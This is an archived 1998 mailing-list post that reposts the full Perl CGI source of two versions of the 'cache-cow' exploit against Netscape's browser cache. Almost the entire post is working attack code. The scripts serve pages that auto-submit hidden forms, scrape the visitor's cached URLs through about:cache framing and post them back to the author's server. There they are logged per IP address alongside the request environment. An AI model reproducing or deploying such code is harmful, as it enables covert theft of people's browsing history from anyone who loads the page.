Hi, Below is source code for the two versions of the Netscape Cache exploit that was recently discovered by Dan Brumleve <nothingat_private>, as found on his web site at http://www.shout.net/~nothing/cache-cow/index.html First version <cache-cow.cgi>, and then second version <view-cache-cow-4.06.cgi> listed. -----snip----- #!/usr/bin/perl # # cache-cow.cgi -- Dan Brumleve <nothingat_private>, 1998.08.23 my $self = "http://www.shout.net/nothing/cache-cow.cgi"; if ($ENV{PATH_INFO}) { (my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o; <html><body onLoad="document.f.submit()"><ba se href="about:"><for m name=f action=cache method=post><input type=submit></form></body> </html> EOF } elsif ($ENV{CONTENT_LENGTH}) { my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;} sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history= join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=) split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open( FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C". "ontent-type: text/plain\n\nHere are the URLs retrieved from your ". "browser:\n\n$history"; } else { (my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n"; $self/></a></body><script>function chunk(s){return("href= "+escape(s));}function moo(){if(!document.links.length){r eturn("");}var str=chunk(document.links[0]);var i=documen t.links.length;while(--i){str+="&"+chunk(document.links[i ]);}return(str);}</script><body onLoad="document.f.cache. value=moo();document.f.submit()"><form action="$self" nam e=f method=post><input type=hidden name=cache><input type =submit></form><a href=$self EOF } exit 0; -----snip----- -----snip----- #!/usr/bin/perl # # cache-cow-4.06.cgi -- Dan Brumleve <nothingat_private>, 1998.09.26 my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi"; if ($ENV{QUERY_STRING}) { (my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o; <html><head><script>function chunk(s){return("href=" + escape(s));} function moo(d){if(!d.l inks.length){return("");} var str=chunk(d. links[0]);var i=d.links.length;wh ile(--i){str+="&"+chunk(d.links[ i]);} return(s tr);}function check(){ var m=moo(top.cache.document ); if (m=="") { docume nt.location.reload(); return; }document.f.c ache.value=m;doc ument.f.submit();}</script></head><body onLoad="c heck()"><form acti on="$self" name=f target=_top method=post><inpu t type=hidden name=cac he><input type=submit></form></body></html> EOF } elsif ($ENV{PATH_INFO}) { (my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o; <html><body onLoad="document.f.submit()"><ba se href="about:"><for m name=f action=cache method=post><input type=submit></form></body> </html> EOF } elsif ($ENV{CONTENT_LENGTH}) { my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;} sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history= join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=) split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open( FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C". "ontent-type: text/plain\n\nHere are the URLs retrieved from your ". "browser:\n\n$history"; } else { print"Content-type: text/html\n\n".<<" EOF"; <html><head> <frameset rows="1,*"><frame src= "$self?cow" name=cow><frame src="$self/cache" name=cache></frameset></head></html> EOF } exit 0; -----snip----- -- Ken Williams Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml E.H.A.P. Corporation http://www.ehap.org/ ehapat_private infoat_private NCSU Comp Sci Dept http://www.csc.ncsu.edu/ jkwilli2at_private PGP DSS/DH/RSA Keys http://www4.ncsu.edu/~jkwilli2/pgpkey/ __________________________________________________ Get Your Private, Free Email at http://www.nsa.gov
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:06 PDT